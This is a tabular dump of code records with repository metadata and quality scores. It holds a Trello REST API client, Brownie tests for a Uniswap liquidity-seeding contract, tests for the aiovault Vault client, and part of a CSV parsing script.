hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
55e916faaa5c6e83aba5d5dcdbb7e7227823c94e | 164 | py | Python | vofotensors/__init__.py | JulianKarlBauer/fiber_orientation_tensors_2021 | d42bafd17c2f1a18b9a3f45952c6f76643b4b86f | ["MIT"] | null | null | null | vofotensors/__init__.py | JulianKarlBauer/fiber_orientation_tensors_2021 | d42bafd17c2f1a18b9a3f45952c6f76643b4b86f | ["MIT"] | 1 | 2021-12-20T21:19:43.000Z | 2021-12-20T21:19:43.000Z | vofotensors/__init__.py | JulianKarlBauer/fiber_orientation_tensors_2021 | d42bafd17c2f1a18b9a3f45952c6f76643b4b86f | ["MIT"] | null | null | null | from . import abc
from . import numbers
from . import notation
from . import utils
from . import deviators_2
from . import deviators_4
from . import fabric_tensors
| 20.5 | 28 | 0.786585 | 24 | 164 | 5.25 | 0.458333 | 0.555556 | 0.301587 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014706 | 0.170732 | 164 | 7 | 29 | 23.428571 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3667362972baf8194180bff19804abbaff6ebe14 | 13,313 | py | Python | trello/cards.py | dellelce/trellopy | c64885e4b6ae6fd3f6a22a512ffbce033215fc19 | ["BSD-2-Clause"] | null | null | null | trello/cards.py | dellelce/trellopy | c64885e4b6ae6fd3f6a22a512ffbce033215fc19 | ["BSD-2-Clause"] | null | null | null | trello/cards.py | dellelce/trellopy | c64885e4b6ae6fd3f6a22a512ffbce033215fc19 | ["BSD-2-Clause"] | null | null | null | import json
import requests


class Cards(object):
    __module__ = 'trello'

    def __init__(self, apikey, token=None):
        self._apikey = apikey
        self._token = token

    def get(self, card_id_or_shortlink, actions=None, actions_limit=None, action_fields=None, attachments=None, attachment_fields=None, members=None, member_fields=None, checkItemStates=None, checkItemState_fields=None, checklists=None, checklist_fields=None, board=None, board_fields=None, list=None, list_fields=None, fields=None):
        resp = requests.get("https://trello.com/1/cards/%s" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, actions=actions, actions_limit=actions_limit, action_fields=action_fields, attachments=attachments, attachment_fields=attachment_fields, members=members, member_fields=member_fields, checkItemStates=checkItemStates, checkItemState_fields=checkItemState_fields, checklists=checklists, checklist_fields=checklist_fields, board=board, board_fields=board_fields, list=list, list_fields=list_fields, fields=fields), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_field(self, field, card_id_or_shortlink):
        resp = requests.get("https://trello.com/1/cards/%s/%s" % (card_id_or_shortlink, field), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_action(self, card_id_or_shortlink, filter=None, fields=None, limit=None, format=None, since=None, page=None, idModels=None):
        resp = requests.get("https://trello.com/1/cards/%s/actions" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, filter=filter, fields=fields, limit=limit, format=format, since=since, page=page, idModels=idModels), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_attachment(self, card_id_or_shortlink, fields=None):
        resp = requests.get("https://trello.com/1/cards/%s/attachments" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_board(self, card_id_or_shortlink, fields=None):
        resp = requests.get("https://trello.com/1/cards/%s/board" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_board_field(self, field, card_id_or_shortlink):
        resp = requests.get("https://trello.com/1/cards/%s/board/%s" % (card_id_or_shortlink, field), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_checkItemState(self, card_id_or_shortlink, fields=None):
        resp = requests.get("https://trello.com/1/cards/%s/checkItemStates" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_checklist(self, card_id_or_shortlink, cards=None, card_fields=None, checkItems=None, checkItem_fields=None, filter=None, fields=None):
        resp = requests.get("https://trello.com/1/cards/%s/checklists" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, cards=cards, card_fields=card_fields, checkItems=checkItems, checkItem_fields=checkItem_fields, filter=filter, fields=fields), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_list(self, card_id_or_shortlink, fields=None):
        resp = requests.get("https://trello.com/1/cards/%s/list" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_list_field(self, field, card_id_or_shortlink):
        resp = requests.get("https://trello.com/1/cards/%s/list/%s" % (card_id_or_shortlink, field), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_member(self, card_id_or_shortlink, fields=None):
        resp = requests.get("https://trello.com/1/cards/%s/members" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def get_membersVoted(self, card_id_or_shortlink, fields=None):
        resp = requests.get("https://trello.com/1/cards/%s/membersVoted" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token, fields=fields), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def update(self, card_id_or_shortlink, name=None, desc=None, closed=None, idAttachmentCover=None, idList=None, pos=None, due=None, subscribed=None):
        resp = requests.put("https://trello.com/1/cards/%s" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(name=name, desc=desc, closed=closed, idAttachmentCover=idAttachmentCover, idList=idList, pos=pos, due=due, subscribed=subscribed))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_checklist_checkItem_name_idCheckList_idCheckItem(self, idCheckList, idCheckItem, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/checklist/%s/checkItem/%s/name" % (card_id_or_shortlink, idCheckList, idCheckItem), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_checklist_checkItem_po_idCheckList_idCheckItem(self, idCheckList, idCheckItem, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/checklist/%s/checkItem/%s/pos" % (card_id_or_shortlink, idCheckList, idCheckItem), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_checklist_checkItem_state_idCheckList_idCheckItem(self, idCheckList, idCheckItem, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/checklist/%s/checkItem/%s/state" % (card_id_or_shortlink, idCheckList, idCheckItem), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_closed(self, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/closed" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_desc(self, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/desc" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_due(self, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/due" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_idAttachmentCover(self, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/idAttachmentCover" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_idList(self, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/idList" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_name(self, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/name" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_po(self, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/pos" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def update_subscribed(self, card_id_or_shortlink, value):
        resp = requests.put("https://trello.com/1/cards/%s/subscribed" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def new(self, name, idList, desc=None, pos=None, idCardSource=None, keepFromSource=None):
        resp = requests.post("https://trello.com/1/cards", params=dict(key=self._apikey, token=self._token), data=dict(name=name, idList=idList, desc=desc, pos=pos, idCardSource=idCardSource, keepFromSource=keepFromSource))
        resp.raise_for_status()
        return json.loads(resp.content)

    def new_action_comment(self, card_id_or_shortlink, text):
        resp = requests.post("https://trello.com/1/cards/%s/actions/comments" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(text=text))
        resp.raise_for_status()
        return json.loads(resp.content)

    def new_attachment(self, card_id_or_shortlink, file=None, url=None, name=None):
        resp = requests.post("https://trello.com/1/cards/%s/attachments" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(file=file, url=url, name=name))
        resp.raise_for_status()
        return json.loads(resp.content)

    def new_checklist(self, card_id_or_shortlink, value):
        resp = requests.post("https://trello.com/1/cards/%s/checklists" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def new_label(self, card_id_or_shortlink, value):
        resp = requests.post("https://trello.com/1/cards/%s/labels" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def new_member(self, card_id_or_shortlink, value):
        resp = requests.post("https://trello.com/1/cards/%s/members" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def new_membersVoted(self, card_id_or_shortlink, value):
        resp = requests.post("https://trello.com/1/cards/%s/membersVoted" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=dict(value=value))
        resp.raise_for_status()
        return json.loads(resp.content)

    def delete(self, card_id_or_shortlink):
        resp = requests.delete("https://trello.com/1/cards/%s" % (card_id_or_shortlink), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def delete_attachment_idAttachment(self, idAttachment, card_id_or_shortlink):
        resp = requests.delete("https://trello.com/1/cards/%s/attachments/%s" % (card_id_or_shortlink, idAttachment), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def delete_checklist_idChecklist(self, idChecklist, card_id_or_shortlink):
        resp = requests.delete("https://trello.com/1/cards/%s/checklists/%s" % (card_id_or_shortlink, idChecklist), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def delete_label_color(self, color, card_id_or_shortlink):
        resp = requests.delete("https://trello.com/1/cards/%s/labels/%s" % (card_id_or_shortlink, color), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def delete_member_idMember(self, idMember, card_id_or_shortlink):
        resp = requests.delete("https://trello.com/1/cards/%s/members/%s" % (card_id_or_shortlink, idMember), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)

    def delete_membersVoted_idMember(self, idMember, card_id_or_shortlink):
        resp = requests.delete("https://trello.com/1/cards/%s/membersVoted/%s" % (card_id_or_shortlink, idMember), params=dict(key=self._apikey, token=self._token), data=None)
        resp.raise_for_status()
        return json.loads(resp.content)
| 67.57868 | 557 | 0.714114 | 1,873 | 13,313 | 4.831821 | 0.04645 | 0.047735 | 0.063646 | 0.135249 | 0.818343 | 0.801436 | 0.787072 | 0.779779 | 0.779779 | 0.767403 | 0 | 0.003265 | 0.148877 | 13,313 | 196 | 558 | 67.923469 | 0.795428 | 0 | 0 | 0.477419 | 0 | 0.019355 | 0.111535 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.245161 | false | 0 | 0.012903 | 0 | 0.509677 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
367c6b20aad2d9ac2695ce45c9a2b17b46991c8d | 6,188 | py | Python | tests/test_provide.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | ["MIT"] | 55 | 2020-12-18T15:34:11.000Z | 2022-03-27T12:50:09.000Z | tests/test_provide.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | ["MIT"] | null | null | null | tests/test_provide.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | ["MIT"] | 17 | 2020-12-18T14:36:32.000Z | 2022-02-10T17:41:12.000Z | import pytest
import brownie


@pytest.fixture
def seed(SeedLiquidity, uniswap, lido, weth, accounts):
    return SeedLiquidity.deploy(
        uniswap,
        [lido, weth],
        ["10 ether", "10 ether"],
        14 * 86400,
        0,
        {"from": accounts[0]},
    )


def test_both_unfilled(seed, lido, weth, agent, whale, interface):
    pair = interface.ERC20(seed.pair())
    lido_amount = "9 ether"
    weth_amount = "9 ether"

    lido.approve(seed, lido_amount, {'from': agent})
    seed.deposit(
        [lido_amount, 0],
        {'from': agent},
    )
    weth.approve(seed, weth_amount, {'from': whale})
    seed.deposit(
        [0, weth_amount],
        {'from': whale},
    )

    assert lido.balanceOf(seed) == lido_amount
    assert seed.balances(agent, 0) == lido_amount
    assert seed.totals(0) == lido_amount
    assert weth.balanceOf(seed) == weth_amount
    assert seed.balances(whale, 1) == weth_amount
    assert seed.totals(1) == weth_amount

    with brownie.reverts():
        seed.provide()

    assert seed.liquidity() == 0
    assert pair.balanceOf(seed) == 0
    assert pair.totalSupply() == 0


def test_lido_unfilled(seed, lido, weth, agent, whale, interface):
    pair = interface.ERC20(seed.pair())
    lido_amount = "9 ether"
    weth_amount = "10 ether"

    lido.approve(seed, lido_amount, {'from': agent})
    seed.deposit(
        [lido_amount, 0],
        {'from': agent},
    )
    weth.approve(seed, weth_amount, {'from': whale})
    seed.deposit(
        [0, weth_amount],
        {'from': whale},
    )

    assert lido.balanceOf(seed) == lido_amount
    assert seed.balances(agent, 0) == lido_amount
    assert seed.totals(0) == lido_amount
    assert weth.balanceOf(seed) == weth_amount
    assert seed.balances(whale, 1) == weth_amount
    assert seed.totals(1) == weth_amount

    with brownie.reverts():
        seed.provide()

    assert seed.liquidity() == 0
    assert pair.balanceOf(seed) == 0
    assert pair.totalSupply() == 0


def test_weth_unfilled(seed, lido, weth, agent, whale, interface):
    pair = interface.ERC20(seed.pair())
    lido_amount = "10 ether"
    weth_amount = "9 ether"

    lido.approve(seed, lido_amount, {'from': agent})
    seed.deposit(
        [lido_amount, 0],
        {'from': agent},
    )
    weth.approve(seed, weth_amount, {'from': whale})
    seed.deposit(
        [0, weth_amount],
        {'from': whale},
    )

    assert lido.balanceOf(seed) == lido_amount
    assert seed.balances(agent, 0) == lido_amount
    assert seed.totals(0) == lido_amount
    assert weth.balanceOf(seed) == weth_amount
    assert seed.balances(whale, 1) == weth_amount
    assert seed.totals(1) == weth_amount

    with brownie.reverts():
        seed.provide()

    assert seed.liquidity() == 0
    assert pair.balanceOf(seed) == 0
    assert pair.totalSupply() == 0


def test_filled(seed, lido, weth, agent, whale, interface):
    pair = interface.ERC20(seed.pair())
    lido_amount = "10 ether"
    weth_amount = "10 ether"

    lido.approve(seed, lido_amount, {'from': agent})
    seed.deposit(
        [lido_amount, 0],
        {'from': agent},
    )
    weth.approve(seed, weth_amount, {'from': whale})
    seed.deposit(
        [0, weth_amount],
        {'from': whale},
    )

    assert lido.balanceOf(seed) == lido_amount
    assert seed.balances(agent, 0) == lido_amount
    assert seed.totals(0) == lido_amount
    assert weth.balanceOf(seed) == weth_amount
    assert seed.balances(whale, 1) == weth_amount
    assert seed.totals(1) == weth_amount

    seed.provide()

    assert seed.liquidity() > 0
    assert pair.balanceOf(seed) == seed.liquidity()
    assert pair.balanceOf(seed) == pair.totalSupply() - 1000  # 1000 LP tokens burned

    # Check revert on second time
    with brownie.reverts():
        seed.provide()


def test_existing(seed, lido, weth, agent, whale, interface, uniswap, chain):
    pair = interface.ERC20(seed.pair())

    # Prefund pool
    lido_amount = "1 ether"
    weth_amount = "1 ether"
    lido.transfer(whale, lido_amount, {'from': agent})
    lido.approve(uniswap, lido_amount, {'from': whale})
    weth.approve(uniswap, weth_amount, {'from': whale})
    uniswap.addLiquidity(
        lido,
        weth,
        lido_amount,
        weth_amount,
        lido_amount,
        weth_amount,
        whale,
        chain.time(),
        {'from': whale},
    )
    assert seed.liquidity() == 0
    assert pair.balanceOf(seed) == 0
    assert pair.balanceOf(whale) > 0
    assert pair.totalSupply() > 0

    # Try to seed
    lido_amount = "10 ether"
    weth_amount = "10 ether"
    lido.approve(seed, lido_amount, {'from': agent})
    seed.deposit(
        [lido_amount, 0],
        {'from': agent},
    )
    weth.approve(seed, weth_amount, {'from': whale})
    seed.deposit(
        [0, weth_amount],
        {'from': whale},
    )

    assert lido.balanceOf(seed) == lido_amount
    assert seed.balances(agent, 0) == lido_amount
    assert seed.totals(0) == lido_amount
    assert weth.balanceOf(seed) == weth_amount
    assert seed.balances(whale, 1) == weth_amount
    assert seed.totals(1) == weth_amount

    with brownie.reverts():
        seed.provide()

    assert seed.liquidity() == 0
    assert pair.balanceOf(seed) == 0
    assert pair.totalSupply() > 0


def test_expired(seed, lido, weth, agent, whale, interface, chain):
    pair = interface.ERC20(seed.pair())
    lido_amount = "10 ether"
    weth_amount = "10 ether"

    lido.approve(seed, lido_amount, {'from': agent})
    seed.deposit(
        [lido_amount, 0],
        {'from': agent},
    )
    weth.approve(seed, weth_amount, {'from': whale})
    seed.deposit(
        [0, weth_amount],
        {'from': whale},
    )

    assert lido.balanceOf(seed) == lido_amount
    assert seed.balances(agent, 0) == lido_amount
    assert seed.totals(0) == lido_amount
    assert weth.balanceOf(seed) == weth_amount
    assert seed.balances(whale, 1) == weth_amount
    assert seed.totals(1) == weth_amount

    chain.sleep(14 * 86400)

    with brownie.reverts():
        seed.provide()

    assert seed.liquidity() == 0
    assert pair.balanceOf(seed) == 0
    assert pair.totalSupply() == 0
| 26.904348 | 85 | 0.618293 | 759 | 6,188 | 4.922266 | 0.080369 | 0.109743 | 0.102784 | 0.066113 | 0.842345 | 0.828426 | 0.802195 | 0.802195 | 0.802195 | 0.802195 | 0 | 0.025208 | 0.243536 | 6,188 | 229 | 86 | 27.021834 | 0.772912 | 0.011959 | 0 | 0.75 | 0 | 0 | 0.038959 | 0 | 0 | 0 | 0 | 0 | 0.315217 | 1 | 0.038043 | false | 0 | 0.01087 | 0.005435 | 0.054348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
36aeb6ba65be0d02554546aed978bd47e0e3c4f5 | 2,485 | py | Python | tests/test_token.py | johnnoone/aiovault | 03e1bfb6f0404dcf97ce87a98c539027c4e78a37 | ["BSD-3-Clause"] | 1 | 2022-01-31T22:37:57.000Z | 2022-01-31T22:37:57.000Z | tests/test_token.py | johnnoone/aiovault | 03e1bfb6f0404dcf97ce87a98c539027c4e78a37 | ["BSD-3-Clause"] | null | null | null | tests/test_token.py | johnnoone/aiovault | 03e1bfb6f0404dcf97ce87a98c539027c4e78a37 | ["BSD-3-Clause"] | null | null | null | from aiovault import Vault
from conftest import async_test
import pytest


@async_test
def test_lookup_1(dev_server):
    client = Vault(dev_server.addr, token=dev_server.root_token)
    token = yield from client.auth.lookup_self()
    assert token.id == dev_server.root_token


@async_test
def test_lookup_2(dev_server):
    client = Vault(dev_server.addr, token=dev_server.root_token)
    token = yield from client.auth.lookup(dev_server.root_token)
    assert token.id == dev_server.root_token


@async_test
def test_lookup_3(dev_server):
    client = Vault(dev_server.addr, token=dev_server.root_token)
    token1 = yield from client.auth.create()
    token2 = yield from client.auth.lookup(token1.id)
    assert token2.id == token1.id


@async_test
def test_renew(dev_server):
    client = Vault(dev_server.addr, token=dev_server.root_token)
    token = yield from client.auth.create(lease='1h')
    token = yield from client.auth.renew(token)


@async_test
def test_revoke_prefix(dev_server):
    client = Vault(dev_server.addr, token=dev_server.root_token)
    token = yield from client.auth.create()
    yield from client.auth.lookup(token)
    revoked = yield from client.auth.revoke_prefix('auth/token/')
    assert revoked is True
    with pytest.raises(KeyError):
        yield from client.auth.lookup(token)


@async_test
def test_revoke_cascade(dev_server):
    client = Vault(dev_server.addr, token=dev_server.root_token)
    parent_token = yield from client.auth.create()
    client_b = Vault(dev_server.addr, token=parent_token)
    child_token = yield from client_b.auth.create()
    yield from client.auth.lookup(parent_token)
    yield from client.auth.lookup(child_token)
    yield from client.auth.revoke(parent_token)
    with pytest.raises(KeyError):
        yield from client.auth.lookup(parent_token)
    with pytest.raises(KeyError):
        yield from client.auth.lookup(child_token)


@async_test
def test_revoke_orphan(dev_server):
    client = Vault(dev_server.addr, token=dev_server.root_token)
    parent_token = yield from client.auth.create()
    client_b = Vault(dev_server.addr, token=parent_token)
    child_token = yield from client_b.auth.create()
    yield from client.auth.lookup(parent_token)
    yield from client.auth.lookup(child_token)
    yield from client.auth.revoke_orphan(parent_token)
    with pytest.raises(KeyError):
        yield from client.auth.lookup(parent_token)
    yield from client.auth.lookup(child_token)
| 28.563218 | 65 | 0.746881 | 367 | 2,485 | 4.839237 | 0.117166 | 0.131757 | 0.202703 | 0.23536 | 0.871622 | 0.803491 | 0.757883 | 0.738176 | 0.738176 | 0.710586 | 0 | 0.004306 | 0.158954 | 2,485 | 86 | 66 | 28.895349 | 0.845455 | 0 | 0 | 0.62069 | 0 | 0 | 0.005231 | 0 | 0 | 0 | 0 | 0 | 0.068966 | 1 | 0.12069 | false | 0 | 0.051724 | 0 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
36b182eb7702349ceb966260961a193c8b6b73a9 | 73,910 | py | Python | parseresults/readcsv.py | MECPerf/MECPerf | d34f5cc981c9d5fc5482ff81eea04412ad946829 | ["BSD-3-Clause"] | 1 | 2021-01-16T02:02:17.000Z | 2021-01-16T02:02:17.000Z | parseresults/readcsv.py | MECPerf/MECPerf | d34f5cc981c9d5fc5482ff81eea04412ad946829 | ["BSD-3-Clause"] | null | null | null | parseresults/readcsv.py | MECPerf/MECPerf | d34f5cc981c9d5fc5482ff81eea04412ad946829 | ["BSD-3-Clause"] | 1 | 2019-12-16T12:47:07.000Z | 2019-12-16T12:47:07.000Z | import csv
import sys
import logging
import datetime
from collections import OrderedDict
_MINROWNUMBER = 50
def _get_subnetaddresses(config_parser, section, conntype, logger):
if conntype == "wifi":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_wifi")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_wifi")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_wifi")
elif conntype == "lte":
client_subnetaddr = config_parser.get(section, "client_subnetaddr_lte")
edgeserver_subnetaddr = config_parser.get(section, "edgeserver_subnetaddr_lte")
cloudserver_subnetaddr = config_parser.get(section, "remoteserver_subnetaddr_lte")
else:
print ("unknown connection type")
logger.critical("unknown connection type " + str(conntype))
logger.critical("EXIT")
sys.exit(0)
return client_subnetaddr, edgeserver_subnetaddr, cloudserver_subnetaddr
